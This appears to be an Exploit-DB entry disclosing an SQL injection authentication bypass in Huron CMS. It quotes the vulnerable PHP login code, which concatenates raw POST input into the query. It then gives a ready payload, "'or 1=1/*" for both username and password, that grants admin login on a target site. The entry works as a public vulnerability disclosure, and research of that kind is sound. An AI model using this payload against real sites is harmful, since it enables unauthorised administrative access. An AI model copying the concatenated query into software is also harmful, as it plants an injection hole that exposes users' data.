EXPLOITS

Huron CMS 8 11 2007 - Authentication Bypass

Author: mat
type: webapps
platform: php
port: 
date_added: 2010-03-29  
date_updated:   
verified: 1  
codes: OSVDB-63363  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comHuron_28_11_2007.zip  

raw file: 11963.txt  

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

//------------------------------------------------------------------+
<?
	$consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'";
	$resultado=mysql_query($consulta,$link);
	$i=0;
	while($row = mysql_fetch_array($resultado))
	{
		$i++;
	}
	if($i>0){
?>
//------------------------------------------------------------------+

http://[target]/[path]/index.php

Put as username and password: 'or 1=1/*
You will log in as admin

Greetings: All Hackerz